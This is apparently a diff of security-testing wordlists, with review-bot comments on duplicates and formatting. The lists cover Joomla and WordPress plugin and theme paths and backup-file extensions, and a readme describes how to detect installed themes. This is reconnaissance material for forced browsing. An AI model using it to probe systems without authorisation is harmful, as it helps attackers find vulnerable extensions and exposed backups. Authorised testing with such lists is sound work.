themes/zilo_blog/
|
||||
themes/zubrick/
|
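Review bot: The first entry, `themes/001%20Dev%20Skin/`, is already percent-encoded while every other line is a raw path, so a consumer that URL-encodes each line would turn it into `%2520` and never match the real directory; store it unencoded or state in the project docs that the list is pre-encoded. Thirteen names (for example `themes/bluemarine`, `themes/garland`, `themes/seven`, `themes/stark`) also appear both with and without the trailing slash, which looks like two merged sources rather than a deliberate choice. If the slash-less forms are not intentional they can be dropped so the file uses one convention.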
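--- a/discovery/predictable-filepaths/cms/joomla_plugins.txt
+++ b/discovery/predictable-filepaths/cms/joomla_plugins.txt
@@ -0,0 +1,224 @@
+components/com_acajoom/
+components/com_aclassf/
+components/com_acmisc/
+components/com_adsmanager/
+components/com_agora/
+components/com_ajaxchat/
+components/com_akogallery/
+components/com_album/
+components/com_allvideosreloaded/
+components/com_alphauserpoints/
+components/com_aprice/
+components/com_artportal/
+components/com_avreloaded/
+components/com_banners/
+components/com_bfsurvey_basic/
+components/com_booklibrary/
+components/com_bookmarks/
+components/com_carman/
+components/com_cartikads/
+components/com_casino/
+components/com_cbresumebuilder/
+components/com_chatroom/
+components/com_ckforms/
+components/com_comment/
+components/com_comprofiler/
+components/com_contact/
+components/com_contactus/
+components/com_content/
+components/com_ContentBlogList/
+components/com_cronjobs/
+components/com_customquickicons/
+components/com_dhforum/
+components/com_digifolio/
+components/com_digistore/
+components/com_djcatalog/
+components/com_dm_orders/
+components/com_docman/
+components/com_doqment/
+components/com_easygallery/
+components/com_easygb/
+components/com_easygb2/
+components/com_eventlist/
+components/com_events/
+components/com_extplorer/
+components/com_ezine/
+components/com_ezrealty/
+components/com_facebook/
+components/com_facileforms/
+components/com_fastball/
+components/com_favourites/
+components/com_fireboard/
+components/com_flickr4j/
+components/com_foobla_suggestions/
+components/com_form/
+components/com_forum/
+components/com_frontpage/
+components/com_games/
+components/com_gameserver/
+components/com_gcalendar/
+components/com_groups/
+components/com_hbssearch/
+components/com_hiscat/
+components/com_icrmbasic/
+components/com_idoblog/
+components/com_intuit/
+components/com_intuitLocal/
+components/com_invite/
+components/com_jabode/
+components/com_jbook/
+components/com_jbudgetsmagic/
+components/com_jcalpro/
+components/com_jce/
+components/com_jcomments/
+components/com_jeemaarticlecollection/
+components/com_jinc/
+components/com_jmovies/
+components/com_job/
+components/com_jomcomment/
+components/com_joomap/
+components/com_joomfish/
+components/com_joomlapack/
+components/com_joomlastats/
+components/com_joomlaxplorer/
+components/com_joomportfolio/
+components/com_joomunity/
+components/com_j-projects/
+components/com_jreservation/
+components/com_jshop/
+components/com_jsjobs/
+components/com_jtips/
+components/com_juser/
+components/com_kide/
+components/com_letterman/
+components/com_livechat/
+components/com_login/
+components/com_mailto/
+components/com_media/
+components/com_messages/
+components/com_messenger/
+components/com_Mochigames/
+components/com_morfeoshow/
+components/com_moschat/
+components/com_mosres/
+components/com_mytube/
+components/com_network/
+components/com_newsfeeds/
+components/com_ninjacentral/
+components/com_omphotogallery/
+components/com_oprykningspoint_mc/
+components/com_otzivi/
+components/com_page/
+components/com_parainvite/
+components/com_paxxgallery/
+components/com_perchagallery/
+components/com_personel/
+components/com_photo/
+components/com_photoblog/
+components/com_places/
+components/com_poll/
+components/com_ponygallery/
+components/com_privmsgs/
+components/com_proofreader/
+components/com_qcache/
+components/com_rate/
+components/com_rating/
+components/com_registration/
+components/com_rsform/
+components/com_rsgallery2/
+components/com_rss/
+components/com_schools/
+components/com_search/
+components/com_sef/
+components/com_sef/
+components/com_seminar/
+components/com_seyret/
+components/com_shoutbox/
+components/com_siirler/
+components/com_simple_review/
+components/com_simpleshop/
+components/com_sobi2/
+components/com_soundset/
+components/com_sportfusion/
+components/com_store/
+components/com_subscribe/
+components/com_surveymanager/
+components/com_swmenufree/
+components/com_thumbnailpro/
+components/com_tpjobs/
+components/com_trabalhe_conosco/
+components/com_tupinambis/
+components/com_user/
+components/com_users/
+components/com_virtualkiss/
+components/com_virtuemart/
+components/com_vxdate/
+components/com_webcamxp/
+components/com_weblinks/
+components/com_weblogs/
+components/com_wrapper/
+components/com_wrapper/
+components/com_wrapper/
+components/com_xmap/
+components/com_zcalendar/
+components/js_relevant/
+modules/mod_adscroller/
+modules/mod_archive/
+modules/mod_articles_archive/
+modules/mod_articles_category/
+modules/mod_articles_latest/
+modules/mod_articles_news/
+modules/mod_articles_popular/
+modules/mod_banners/
+modules/mod_breadcrumbs/
+modules/mod_briaskISS/
+modules/mod_ccnewsletter/
+modules/mod_custom/
+modules/mod_dn/
+modules/mod_feed/
+modules/mod_filterednews/
+modules/mod_flashmod/
+modules/mod_footer/
+modules/mod_forme/
+modules/mod_gk_news_image/
+modules/mod_internetradio/
+modules/mod_internetradio2/
+modules/mod_jabulletin/
+modules/mod_janewsflash/
+modules/mod_ja_slwi/
+modules/mod_jms_support/
+modules/mod_latestnews/
+modules/mod_login/
+modules/mod_mainmenu/
+modules/mod_menu/
+modules/mod_minifrontpage/
+modules/mod_mostread/
+modules/mod_newsflash/
+modules/mod_onlineusers/
+modules/mod_onlineusers_pro/
+modules/mod_poll/
+modules/mod_product_categories/
+modules/mod_productscroller/
+modules/mod_random_image/
+modules/mod_related_items/
+modules/mod_rokslideshow/
+modules/mod_rsform/
+modules/mod_search/
+modules/mod_sections/
+modules/mod_skychat/
+modules/mod_sobi2simplefeatured/
+modules/mod_sobidropdown/
+modules/mod_stats/
+modules/mod_swmenufree/
+modules/mod_syndicate/
+modules/mod_tcimageslider/
+modules/mod_users_latest/
+modules/mod_virtuemart/
+modules/mod_virtuemart_search/
+modules/mod_virtuemart_topten/
+modules/mod_vvisit_counter/
+modules/mod_weblinks/
+modules/mod_whosonline/
+modules/mod_woodychat/
+modules/mod_wrapper/
+modules/shoutbox/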
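Review bot: This new list contains exact duplicate lines: `components/com_sef/` appears twice and `components/com_wrapper/` three times. Any consumer that walks the file line by line repeats those lookups and reports the same finding more than once, which inflates both scan traffic and result counts when the list is used to inventory installed extensions. The file should be de-duplicated before it lands, for example with `sort -u`, and the `224` line count will drop accordingly.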
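--- a/discovery/predictable-filepaths/cms/joomla_themes.txt
+++ b/discovery/predictable-filepaths/cms/joomla_themes.txt
@@ -0,0 +1,30 @@
+templates/abc/
+templates/atomic/
+templates/b59-tpl8/
+templates/beez/
+templates/carbon_07/
+templates/crub/
+templates/dm_arrow_red/
+templates/gk_eshoptrix_2/
+templates/gk_gomuproject/
+templates/gk_icki_sports/
+templates/gk_musictop/
+templates/ja_purity/
+templates/ja_rochea/
+templates/ja_teline_ii/
+templates/joomlaport_metro/
+templates/js_relevant/
+templates/mynxx_j15/
+templates/planets/
+templates/planetsv2/
+templates/rhuk_milkyway/
+templates/rt_hivemind_j15/
+templates/rt_mediamogul_essentials_j15/
+templates/rt_nexus_j15/
+templates/siteground99/
+templates/siteground-j15-14/
+templates/siteground-j15-68/
+templates/siteground-j15-86/
+templates/system/
+templates/yoo_phoenix/
+templates/yoo_waybeyond/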
2142
discovery/predictable-filepaths/cms/php-nuke.txt
Normal file
2142
discovery/predictable-filepaths/cms/php-nuke.txt
Normal file
File diff suppressed because it is too large
1566
discovery/predictable-filepaths/cms/wordpress.txt
Normal file
1566
discovery/predictable-filepaths/cms/wordpress.txt
Normal file
File diff suppressed because it is too large
|
@ -0,0 +1,46 @@
|
|||
404.php
|
||||
archive.php
|
||||
archives.php
|
||||
author.php
|
||||
category.php
|
||||
comments.php
|
||||
content.php
|
||||
data.php
|
||||
footer.php
|
||||
functions.php
|
||||
header.php
|
||||
home.php
|
||||
image.php
|
||||
images
|
||||
images/content-bg.jpg
|
||||
images/footer.jpg
|
||||
images/footer.png
|
||||
images/functions.php
|
||||
images/gravatar.png
|
||||
images/header-bg.jpg
|
||||
images/header.png
|
||||
images/index.php
|
||||
images/main_bg.png
|
||||
images/rss.png
|
||||
images/Thumbs.db
|
||||
index.php
|
||||
js
|
||||
js/html5.js
|
||||
languages
|
||||
license.txt
|
||||
License.txt
|
||||
links.php
|
||||
page.php
|
||||
print.css
|
||||
readme.txt
|
||||
reset.css
|
||||
rtl.css
|
||||
RTL.css
|
||||
searchform.php
|
||||
search.php
|
||||
sidebar.php
|
||||
single.php
|
||||
style.css
|
||||
tag.php
|
||||
tags.php
|
||||
|
13366
discovery/predictable-filepaths/cms/wp_plugins.txt
Normal file
13366
discovery/predictable-filepaths/cms/wp_plugins.txt
Normal file
File diff suppressed because it is too large
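--- a/discovery/predictable-filepaths/cms/wp_plugins_top225.txt
+++ b/discovery/predictable-filepaths/cms/wp_plugins_top225.txt
@@ -0,0 +1,225 @@
+google-sitemap-generator
+redirection
+wptouch
+ultimate-tinymce
+facebook
+wp-smushit
+share-this
+wp-super-cache
+iwp-client
+advanced-custom-fields
+broken-link-checker
+slideshow-jquery-image-gallery
+user-role-editor
+google-analytics-for-wordpress
+google-analyticator
+updraftplus
+wordpress-backup-to-dropbox
+bbpress
+wysija-newsletters
+add-to-any
+youtube-embed-plus
+backwpup
+backupwordpress
+wp-pagenavi
+tinymce-advanced
+gallery-plugin
+addthis
+easy-fancybox
+stats
+disable-comments
+antispam-bee
+wp-multibyte-patch
+wp-slimstat
+add-link-to-facebook
+wp-photo-album-plus
+buddypress
+social-networks-auto-poster-facebook-twitter-g
+events-manager
+responsive-add-ons
+easy-contact-forms
+post-types-order
+image-widget
+wp-maintenance-mode
+regenerate-thumbnails
+squirrly-seo
+qtranslate
+google-analytics-dashboard-for-wp
+ml-slider
+hupso-share-buttons-for-twitter-facebook-google
+powerpress
+mappress-google-maps-for-wordpress
+types
+options-framework
+ultimate-coming-soon-page
+page-links-to
+official-statcounter-plugin-for-wordpress
+wp-e-commerce
+wordpress-popular-posts
+shareaholic
+floating-social-media-icon
+sucuri-scanner
+breadcrumb-navxt
+really-simple-facebook-twitter-share-buttons
+si-captcha-for-wordpress
+google-sitemap-plugin
+wp-rss-multi-importer
+easy-table
+xhanch-my-twitter
+growmap-anti-spambot-plugin
+sexybookmarks
+all-in-one-event-calendar
+download-manager
+the-events-calendar
+jquery-updater
+newsletter
+wp-postviews
+lightbox-plus
+wp-postratings
+testimonials-widget
+limit-login-attempts
+adrotate
+embedplus-for-wordpress
+all-in-one-wp-security-and-firewall
+disqus-comment-system
+social-media-feather
+mailchimp-for-wp
+xml-sitemap-feed
+mp6
+wp-lightbox-2
+ultimate-maintenance-mode
+wp-postviews
+lightbox-plus
+wp-postratings
+testimonials-widget
+limit-login-attempts
+adrotate
+embedplus-for-wordpress
+all-in-one-wp-security-and-firewall
+disqus-comment-system
+social-media-feather
+mailchimp-for-wp
+xml-sitemap-feed
+mp6
+wp-lightbox-2
+ultimate-maintenance-mode
+social-media-widget
+mailchimp
+commentluv
+ozh-admin-drop-down-menu
+seo-ultimate
+custom-field-template
+black-studio-tinymce-widget
+relevanssi
+seo-facebook-comments
+maintenance
+tablepress
+genesis-simple-sidebars
+clean-and-simple-contact-form-by-meg-nicholas
+all-in-one-favicon
+woosidebars
+printfriendly
+visual-form-builder
+wordpress-ping-optimizer
+wp-google-fonts
+wp-security-scan
+wp-google-maps
+simple-tags
+wponlinebackup
+theme-my-login
+formidable
+wpremote
+wowslider
+contact-form-7-to-database-extension
+gotmls
+jw-player-plugin-for-wordpress
+jetpack
+akismet
+all-in-one-seo-pack
+contact-form-7
+wordpress-seo
+nextgen-gallery
+wordpress-importer
+better-wp-security
+woocommerce
+w3-total-cache
+wordfence
+captcha
+si-contact-form
+really-simple-captcha
+contact-form-plugin
+ps-auto-sitemap
+sociable
+hotfix
+genesis-enews-extended
+adsense-plugin
+easy-theme-and-plugin-upgrades
+ultimate-tag-cloud-widget
+sidebar-login
+secure-wordpress
+seo-image
+search-and-replace
+widget-logic
+contextual-related-posts
+media-element-html5-video-and-audio-player
+wp-optimize
+wiziapp-create-your-own-native-iphone-app
+simply-instagram
+lightbox-gallery
+nrelate-related-content
+booking
+html-javascript-adder
+responsive-lightbox
+simple-backup
+link-library
+contact-form-maker
+wp-customer-reviews
+genesis-simple-hooks
+wp-db-backup
+easing-slider
+google-maps-widget
+wiziapp-create-your-own-native-iphone-app
+simply-instagram
+lightbox-gallery
+nrelate-related-content
+booking
+html-javascript-adder
+responsive-lightbox
+simple-backup
+link-library
+contact-form-maker
+wp-customer-reviews
+genesis-simple-hooks
+wp-db-backup
+easing-slider
+google-maps-widget
+easy-adsense-lite
+wp-dbmanager
+codepeople-post-map
+landing-pages
+google-xml-sitemaps-v3-for-qtranslate
+woocommerce-all-in-one-seo-pack
+option-tree
+wp-polls
+google-analytics-dashboard
+simple-lightbox
+wp-user-avatar
+coming-soon-maintenance-mode-ready
+quick-pagepost-redirect-plugin
+chartbeat
+nextgen-facebook
+wp-mail-smtp
+quick-cache
+link-manager
+video-thumbnails
+soliloquy-lite
+my-calendar
+ckeditor-for-wordpress
+kebo-twitter-feed
+auto-post-thumbnail
+gtranslate
+yop-poll
+wp-filebase
+all-in-one-webmaster
+email-users
+leaflet-maps-marker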
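Review bot: This list has 225 lines but at least 30 of them are repeats, so it holds fewer distinct plugin slugs than the file name promises. The run from `wp-postviews` through `ultimate-maintenance-mode` appears twice back to back, and so does the run from `wiziapp-create-your-own-native-iphone-app` through `google-maps-widget`. Dropping the second copy of each run keeps the order and removes duplicate requests from any scan or inventory check that reads the file. The same kind of repeat shows up further down this page: `.c`, `.dll` and `.txt` each occur twice in the 80-line extension list, and `old` occurs twice in the 13-line suffix list. The file headers for those two sections are not visible here.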
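--- a/discovery/predictable-filepaths/cms/wp_themes.readme
+++ b/discovery/predictable-filepaths/cms/wp_themes.readme
@@ -0,0 +1,12 @@
+Themes usually live in a directory called wp-content.
+
+Determine how the server handles directories which aren't present vs files which aren't present in a path that exists in order to tell which themes are installed.
+
+use wp_common_theme_files.fuzz.php inside the identified theme dirs
+
+Often you can tell the current theme by viewing source.
+
+Theme list generated last on Sept 6 2013
+
+from: http://themes.svn.wordpress.org
+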
7336
discovery/predictable-filepaths/cms/wp_themes.txt
Normal file
7336
discovery/predictable-filepaths/cms/wp_themes.txt
Normal file
File diff suppressed because it is too large
File diff suppressed because it is too large
|
@ -0,0 +1,80 @@
|
|||
.asp
|
||||
.aspx
|
||||
.bat
|
||||
.c
|
||||
.cfm
|
||||
.cgi
|
||||
.com
|
||||
.dll
|
||||
.exe
|
||||
.htm
|
||||
.html
|
||||
.inc
|
||||
.jhtml
|
||||
.jsa
|
||||
.jsp
|
||||
.log
|
||||
.mdb
|
||||
.nsf
|
||||
.php
|
||||
.php2
|
||||
.php3
|
||||
.php4
|
||||
.php5
|
||||
.php6
|
||||
.php7
|
||||
.phtml
|
||||
.phps
|
||||
.pl
|
||||
.reg
|
||||
.sh
|
||||
.shtml
|
||||
.sql
|
||||
.txt
|
||||
.xml
|
||||
.swf
|
||||
.pcap
|
||||
.001
|
||||
.002
|
||||
.1
|
||||
.2
|
||||
.7z
|
||||
.Z
|
||||
.back
|
||||
.backup
|
||||
.bak
|
||||
.bakup
|
||||
.bas
|
||||
.bz2
|
||||
.c
|
||||
.conf
|
||||
.copia
|
||||
.core
|
||||
.cpp
|
||||
.dat
|
||||
.db
|
||||
.default
|
||||
.dll
|
||||
.doc
|
||||
.ini
|
||||
.jar
|
||||
.java
|
||||
.old
|
||||
.orig
|
||||
.pas
|
||||
.rar
|
||||
.sav
|
||||
.saved
|
||||
.source
|
||||
.src
|
||||
.stackdump
|
||||
.tar
|
||||
.tar.gz
|
||||
.temp
|
||||
.test
|
||||
.tgz
|
||||
.tmp
|
||||
.txt
|
||||
.war
|
||||
.zip
|
||||
~
|
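Review bot: Entries in this 80-line list carry a leading dot (`.bak`, `.old`, `.sql`), while the 13-line and 863-line lists that follow store bare suffixes (`bak`, `old`, `sql`), and nothing in the visible sections says which form a consumer should expect. Swapping one list for another would then silently produce candidates with a doubled or missing dot. A comment line inside the wordlist would itself be read as an entry, so the convention is better stated in a README beside the files, for example `Entries in this file include the leading dot; the other extension lists do not.` The file headers for these three sections are not visible on this page, so the file names cannot be given here.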
|
@ -0,0 +1,13 @@
|
|||
backup
|
||||
bck
|
||||
old
|
||||
save
|
||||
bak
|
||||
sav
|
||||
~
|
||||
copy
|
||||
old
|
||||
orig
|
||||
tmp
|
||||
txt
|
||||
back
|
|
@ -0,0 +1,863 @@
|
|||
$er
|
||||
123
|
||||
1pe
|
||||
1ph
|
||||
3dr
|
||||
3dt
|
||||
3me
|
||||
3pe
|
||||
4dl
|
||||
4dv
|
||||
8xk
|
||||
^^^
|
||||
a3l
|
||||
a3m
|
||||
a3w
|
||||
a4l
|
||||
a4m
|
||||
a4w
|
||||
a5l
|
||||
a5w
|
||||
a65
|
||||
aao
|
||||
ab
|
||||
ab1
|
||||
ab2
|
||||
ab3
|
||||
abcd
|
||||
abi
|
||||
abp
|
||||
aby
|
||||
aca
|
||||
acc
|
||||
accdb
|
||||
acf
|
||||
acg
|
||||
ade
|
||||
adp
|
||||
adt
|
||||
adx
|
||||
aft
|
||||
agd
|
||||
aifb
|
||||
alc
|
||||
ald
|
||||
ali
|
||||
amb
|
||||
amsorm
|
||||
an1
|
||||
anme
|
||||
apr
|
||||
arc
|
||||
arh
|
||||
ask
|
||||
asm
|
||||
ast
|
||||
at5
|
||||
att
|
||||
aw
|
||||
awg
|
||||
azw
|
||||
bafl
|
||||
bci
|
||||
bcm
|
||||
bdf
|
||||
bdic
|
||||
bfx
|
||||
bgl
|
||||
bgt
|
||||
bin
|
||||
bjo
|
||||
bk
|
||||
bkk
|
||||
blb
|
||||
bld
|
||||
blg
|
||||
bok
|
||||
box
|
||||
brd
|
||||
brw
|
||||
btf
|
||||
btif
|
||||
btm
|
||||
btr
|
||||
cap
|
||||
cat
|
||||
cbg
|
||||
cch
|
||||
ccr
|
||||
cct
|
||||
cdb
|
||||
cdd
|
||||
cdf
|
||||
cdp
|
||||
cdr
|
||||
cdx
|
||||
cel
|
||||
celtx
|
||||
chg
|
||||
chk
|
||||
chn
|
||||
ckd
|
||||
ckt
|
||||
cl2
|
||||
cl4
|
||||
clb
|
||||
clix
|
||||
clm
|
||||
clp
|
||||
cmbl
|
||||
cna
|
||||
contact
|
||||
cpi
|
||||
cpmz
|
||||
crd
|
||||
crtx
|
||||
csa
|
||||
csv
|
||||
ctf
|
||||
ctt
|
||||
cursorfx
|
||||
curxptheme
|
||||
cvd
|
||||
cvn
|
||||
cwk
|
||||
cws
|
||||
cwz
|
||||
cxt
|
||||
cyo
|
||||
cys
|
||||
daf
|
||||
dal
|
||||
dam
|
||||
das
|
||||
dat
|
||||
data
|
||||
db
|
||||
db2
|
||||
db3
|
||||
dbc
|
||||
dbd
|
||||
dbf
|
||||
dbx
|
||||
dcf
|
||||
dcl
|
||||
dcm
|
||||
dcmd
|
||||
ddc
|
||||
ddcx
|
||||
ddt
|
||||
dem
|
||||
des
|
||||
dex
|
||||
dfm
|
||||
dfproj
|
||||
dft
|
||||
dgb
|
||||
dif
|
||||
dii
|
||||
dlg
|
||||
dm2
|
||||
dmo
|
||||
dmsk
|
||||
dnc
|
||||
dockzip
|
||||
dp1
|
||||
dpn
|
||||
dpx
|
||||
drl
|
||||
dsb
|
||||
dsd
|
||||
dsk
|
||||
dsy
|
||||
dsz
|
||||
dt0
|
||||
dt1
|
||||
dt2
|
||||
dta
|
||||
dtr
|
||||
dvdproj
|
||||
dvo
|
||||
dwi
|
||||
e00
|
||||
eap
|
||||
ebuild
|
||||
ec0
|
||||
eco
|
||||
ecx
|
||||
edb
|
||||
edf
|
||||
eep
|
||||
efx
|
||||
egp
|
||||
emb
|
||||
emd
|
||||
emlxpart
|
||||
enc
|
||||
enw
|
||||
epp
|
||||
epub
|
||||
epw
|
||||
er1
|
||||
esp
|
||||
ess
|
||||
est
|
||||
esx
|
||||
et
|
||||
eta
|
||||
etd
|
||||
etl
|
||||
ev
|
||||
ev3
|
||||
evt
|
||||
evy
|
||||
exif
|
||||
exp
|
||||
exx
|
||||
fa
|
||||
fasta
|
||||
fbl
|
||||
fcd
|
||||
fcs
|
||||
fdb
|
||||
ffd
|
||||
ffwp
|
||||
fhc
|
||||
fid
|
||||
fil
|
||||
flame
|
||||
fll
|
||||
flo
|
||||
flp
|
||||
flt
|
||||
fm
|
||||
fm5
|
||||
fmp
|
||||
fo
|
||||
fob
|
||||
fol
|
||||
fop
|
||||
fox
|
||||
fp
|
||||
fp3
|
||||
fp4
|
||||
fp5
|
||||
fp7
|
||||
frl
|
||||
frm
|
||||
fro
|
||||
frx
|
||||
fsb
|
||||
fsc
|
||||
ftm
|
||||
ftw
|
||||
gan
|
||||
gbr
|
||||
gc
|
||||
gcx
|
||||
gdb
|
||||
ged
|
||||
gedcom
|
||||
gen
|
||||
ggb
|
||||
gml
|
||||
gms
|
||||
gno
|
||||
gnp
|
||||
gp3
|
||||
gpi
|
||||
gps
|
||||
gpx
|
||||
gra
|
||||
grade
|
||||
grf
|
||||
grib
|
||||
grk
|
||||
grr
|
||||
grv
|
||||
gs
|
||||
gst
|
||||
gtp
|
||||
gwk
|
||||
gxl
|
||||
hcc
|
||||
hce
|
||||
hci
|
||||
hcp
|
||||
hcr
|
||||
hcu
|
||||
hda
|
||||
hdb
|
||||
hdf
|
||||
hdi
|
||||
hdl
|
||||
hif
|
||||
hl
|
||||
hml
|
||||
hmt
|
||||
hs2
|
||||
hsk
|
||||
hst
|
||||
htg
|
||||
huh
|
||||
hyv
|
||||
i5z
|
||||
ib
|
||||
ics
|
||||
id2
|
||||
idx
|
||||
igc
|
||||
ihx
|
||||
ii
|
||||
iif
|
||||
img
|
||||
imt
|
||||
ink
|
||||
inp
|
||||
ins
|
||||
ip
|
||||
irock
|
||||
irr
|
||||
irx
|
||||
isf
|
||||
itdb
|
||||
itl
|
||||
itm
|
||||
itn
|
||||
itw
|
||||
itx
|
||||
ivt
|
||||
iw
|
||||
ixb
|
||||
jasper
|
||||
jdb
|
||||
jef
|
||||
jmp
|
||||
jnt
|
||||
job
|
||||
joboptions
|
||||
joined
|
||||
jph
|
||||
jrprint
|
||||
jrxml
|
||||
jude
|
||||
kap
|
||||
kdb
|
||||
kid
|
||||
kismac
|
||||
kmz
|
||||
kpf
|
||||
kpp
|
||||
kpr
|
||||
kpx
|
||||
kpz
|
||||
l
|
||||
l6t
|
||||
laccdb
|
||||
lbl
|
||||
lbx
|
||||
lcd
|
||||
lcf
|
||||
lcm
|
||||
ldif
|
||||
lex
|
||||
lgc
|
||||
lgf
|
||||
lgh
|
||||
lgi
|
||||
lgl
|
||||
lib
|
||||
lif
|
||||
livereg
|
||||
liveupdate
|
||||
lix
|
||||
llb
|
||||
lms
|
||||
lmx
|
||||
lnt
|
||||
loc
|
||||
lp7
|
||||
lrf
|
||||
lrs
|
||||
lrx
|
||||
lsf
|
||||
lsl
|
||||
lsp
|
||||
lsr
|
||||
lst
|
||||
lsu
|
||||
lvm
|
||||
lw4
|
||||
ly
|
||||
m
|
||||
mag
|
||||
mai
|
||||
map
|
||||
masseffectprofile
|
||||
mat
|
||||
mbb
|
||||
mbf
|
||||
mbg
|
||||
mbl
|
||||
mbp
|
||||
mbx
|
||||
mc1
|
||||
mc9
|
||||
mcd
|
||||
md
|
||||
mdb
|
||||
mdc
|
||||
mdf
|
||||
mdl
|
||||
mdm
|
||||
mdn
|
||||
mdt
|
||||
mdx
|
||||
mdz
|
||||
mem
|
||||
menc
|
||||
met
|
||||
mex
|
||||
mfo
|
||||
mfp
|
||||
mgc
|
||||
mls
|
||||
mm
|
||||
mmap
|
||||
mmc
|
||||
mmf
|
||||
mmp
|
||||
mnc
|
||||
mng
|
||||
mnk
|
||||
mno
|
||||
mny
|
||||
mobi
|
||||
moho
|
||||
mosaic
|
||||
mox
|
||||
mpd
|
||||
mpj
|
||||
mpp
|
||||
mpt
|
||||
mpx
|
||||
mpz
|
||||
mq4
|
||||
ms10
|
||||
mth
|
||||
mtw
|
||||
mud
|
||||
muf
|
||||
mw
|
||||
mwf
|
||||
mws
|
||||
mwx
|
||||
mxd
|
||||
myd
|
||||
myi
|
||||
nb
|
||||
nc
|
||||
ndf
|
||||
ndk
|
||||
ndx
|
||||
net
|
||||
neta
|
||||
nfo
|
||||
nitf
|
||||
nmind
|
||||
not
|
||||
notebook
|
||||
np
|
||||
npl
|
||||
npt
|
||||
nrl
|
||||
ns2
|
||||
ns3
|
||||
ns4
|
||||
nsf
|
||||
ntx
|
||||
numbers
|
||||
nvl
|
||||
nyf
|
||||
oab
|
||||
obj
|
||||
odb
|
||||
odf
|
||||
odp
|
||||
ods
|
||||
odx
|
||||
oeaccount
|
||||
ofc
|
||||
ofm
|
||||
oft
|
||||
ofx
|
||||
omcs
|
||||
omp
|
||||
ond
|
||||
one
|
||||
oo3
|
||||
opf
|
||||
opx
|
||||
or2
|
||||
or3
|
||||
or4
|
||||
or5
|
||||
or6
|
||||
org
|
||||
orx
|
||||
otf
|
||||
otl
|
||||
otln
|
||||
ots
|
||||
out
|
||||
ov2
|
||||
ova
|
||||
ovf
|
||||
p96
|
||||
p97
|
||||
pab
|
||||
paf
|
||||
pan
|
||||
pbd
|
||||
pc
|
||||
pcap
|
||||
pcb
|
||||
pcr
|
||||
pd4
|
||||
pd5
|
||||
pdas
|
||||
pdb
|
||||
pdd
|
||||
pdm
|
||||
pds
|
||||
pdx
|
||||
peb
|
||||
pec
|
||||
pep
|
||||
pex
|
||||
pfc
|
||||
pfl
|
||||
phb
|
||||
phm
|
||||
pi
|
||||
pis
|
||||
pjx
|
||||
pka
|
||||
pkb
|
||||
pkh
|
||||
pks
|
||||
pkt
|
||||
pln
|
||||
plw
|
||||
pmo
|
||||
pmr
|
||||
pnproj
|
||||
pnpt
|
||||
pns
|
||||
pnt
|
||||
pod
|
||||
poi
|
||||
pos
|
||||
postal
|
||||
pot
|
||||
potm
|
||||
potx
|
||||
pp2
|
||||
ppf
|
||||
pps
|
||||
ppsx
|
||||
ppt
|
||||
pptm
|
||||
pptx
|
||||
prc
|
||||
pre
|
||||
prf
|
||||
prj
|
||||
prm
|
||||
prs
|
||||
psa
|
||||
psf
|
||||
psm
|
||||
pst
|
||||
ptb
|
||||
ptf
|
||||
ptk
|
||||
ptm
|
||||
ptn
|
||||
ptt
|
||||
ptz
|
||||
pvl
|
||||
pwd
|
||||
pxj
|
||||
pxl
|
||||
q07
|
||||
q08
|
||||
q09
|
||||
q3d
|
||||
qbw
|
||||
qdat
|
||||
qdf
|
||||
qdfm
|
||||
qel
|
||||
qfx
|
||||
qif
|
||||
qpb
|
||||
qpf
|
||||
qph
|
||||
qpm
|
||||
qpw
|
||||
qrp
|
||||
qsd
|
||||
ral
|
||||
rbt
|
||||
rcd
|
||||
rcg
|
||||
rdb
|
||||
rdf
|
||||
rdx
|
||||
ref
|
||||
ret
|
||||
rf1
|
||||
rfa
|
||||
rfo
|
||||
rge
|
||||
rgn
|
||||
rgo
|
||||
rmuf
|
||||
rnq
|
||||
rod
|
||||
rog
|
||||
roi
|
||||
rou
|
||||
rpp
|
||||
rpt
|
||||
rrt
|
||||
rsc
|
||||
rsd
|
||||
rsw
|
||||
rte
|
||||
rvt
|
||||
rwg
|
||||
rzb
|
||||
s85
|
||||
saf
|
||||
sam07
|
||||
sar
|
||||
sav
|
||||
sbd
|
||||
sbf
|
||||
sbq
|
||||
sbt
|
||||
sca
|
||||
scf
|
||||
sch
|
||||
sdb
|
||||
sdc
|
||||
sdf
|
||||
sdp
|
||||
sdq
|
||||
sds
|
||||
sen
|
||||
seo
|
||||
seq
|
||||
ser
|
||||
sgml
|
||||
sgn
|
||||
shp
|
||||
shs
|
||||
shx
|
||||
skc
|
||||
skv
|
||||
skx
|
||||
sle
|
||||
slk
|
||||
slp
|
||||
snapfireshow
|
||||
sonic
|
||||
soundpack
|
||||
spo
|
||||
sps
|
||||
spub
|
||||
spv
|
||||
sq
|
||||
sqd
|
||||
sql
|
||||
sqlite
|
||||
sqr
|
||||
sta
|
||||
stc
|
||||
stf
|
||||
stk
|
||||
stl
|
||||
stm
|
||||
stp
|
||||
str
|
||||
stt
|
||||
stw
|
||||
styk
|
||||
stykz
|
||||
swk
|
||||
sxc
|
||||
sxi
|
||||
sy3
|
||||
t01
|
||||
t02
|
||||
t03
|
||||
t04
|
||||
t05
|
||||
t06
|
||||
t07
|
||||
t08
|
||||
t09
|
||||
t2
|
||||
t3001
|
||||
tax2008
|
||||
tax2009
|
||||
tb
|
||||
tbk
|
||||
tbl
|
||||
tcc
|
||||
tcx
|
||||
tda
|
||||
tdl
|
||||
tdm
|
||||
tdt
|
||||
te
|
||||
te3
|
||||
teacher
|
||||
tef
|
||||
tet
|
||||
tfa
|
||||
tfd
|
||||
tfrd
|
||||
tjp
|
||||
tk3
|
||||
tkfl
|
||||
tmw
|
||||
tol
|
||||
topc
|
||||
tpb
|
||||
tps
|
||||
tr3
|
||||
tra
|
||||
trd
|
||||
trk
|
||||
trs
|
||||
trx
|
||||
tst
|
||||
tsv
|
||||
ttk
|
||||
txa
|
||||
txd
|
||||
txf
|
||||
uccapilog
|
||||
ud
|
||||
udb
|
||||
udeb
|
||||
uds
|
||||
ulf
|
||||
ulz
|
||||
update
|
||||
upoi
|
||||
usr
|
||||
uvf
|
||||
uwl
|
||||
val
|
||||
vbpf1
|
||||
vcd
|
||||
vce
|
||||
vcf
|
||||
vcs
|
||||
vdb
|
||||
vdx
|
||||
vfs
|
||||
vi
|
||||
vip
|
||||
vle
|
||||
vlg
|
||||
vmt
|
||||
voi
|
||||
vok
|
||||
vrd
|
||||
vscontent
|
||||
vsx
|
||||
vtx
|
||||
vxml
|
||||
w02
|
||||
wab
|
||||
wb1
|
||||
wb2
|
||||
wb3
|
||||
wdb
|
||||
wdq
|
||||
wea
|
||||
wfd
|
||||
wfm
|
||||
wgp
|
||||
wgt
|
||||
windowslivecontact
